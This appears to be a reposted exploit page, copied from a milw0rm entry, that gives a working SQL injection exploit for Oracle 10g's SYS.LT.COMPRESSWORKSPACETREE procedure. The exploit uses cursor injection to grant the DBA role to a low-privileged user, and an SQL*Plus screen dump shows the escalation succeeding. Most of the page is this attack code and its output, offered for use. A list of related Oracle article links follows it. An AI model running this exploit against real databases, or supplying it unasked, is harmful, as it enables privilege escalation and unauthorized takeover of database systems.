Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
2009-07-04 21:44
691 查看
This is slightly modified version of: http://milw0rm.com/exploits/7677 This is based on cursor injection and does not need create function privileges: DECLARE D NUMBER; BEGIN D := DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0); SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); end; #-----------screen dump---------------------------------------------------# SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SCOTT CONNECT NO YES NO SCOTT EXECUTE_CATALOG_ROLE NO YES NO SCOTT RESOURCE NO YES NO SQL> DECLARE 2 D NUMBER; 3 BEGIN 4 D := DBMS_SQL.OPEN_CURSOR; 5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme diate ''grant dba to scott'';commit;end;',0); 6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); 7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); 8 end; 9 10 11 / DECLARE * ERROR at line 1: ORA-01403: no data found ORA-06512: at "SYS.LT", line 6118 ORA-06512: at "SYS.LT", line 6087 ORA-06512: at line 7 SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SCOTT CONNECT NO YES NO SCOTT DBA NO YES NO SCOTT EXECUTE_CATALOG_ROLE NO YES NO SCOTT RESOURCE NO YES NO Sid www.notsosecure.com # milw0rm.com [2009-07-02]
相关文章推荐
- 关于用SYS登陆ORACLE 10g 的SQLPLUS
- Docker: oracle_xe_10g 数据库 运行sqlplus 时Message file sp1<lang>.msb not found 错误解决办法_20160513_七侠镇莫尛貝
- SQL trace, 10046, trcsess and tkprof in Oracle 10g(转)
- Oracle 10g中的SQL优化亮点
- 安装Oracle 10g sys,system 密码忘记设置解决办法
- JAVA_WEB Oracle 10g学习:PL/SQL数据类型
- JAVA_WEB Oracle 10g学习: PL/SQL与Oracle间交互
- Oracle 10G:PL/SQL正规表达式(正则表达式)手册
- Oracle 10g SQL 优化再学习
- Oracle 10g处理例外(即sql异常)学习二——自定义例外和非预定义例外
- store_schema.sql(Oracle Darabase 10g SQL书中的store模式SQL语句)
- Oracle 树形SQL语句,SYS_CONNECT_BY_PATH 函数
- Oracle EBS-SQL (SYS-9):职责使用菜单.sql
- Oracle EBS-SQL (SYS-17):查询一张报表在哪个职责下面.sql
- Oracle EBS-SQL (SYS-23):用户权限查询.sql
- Oracle 10g SQL*Plus命令实践
- Oracle 10G:PL/SQL正规表达式(正则表达式)手册
- 忘记oracle(10g)数据库的sys用户密码解决方案
- SQL 行转的理解(Oracle 10g)
- oracle 10g sql*plus常用命令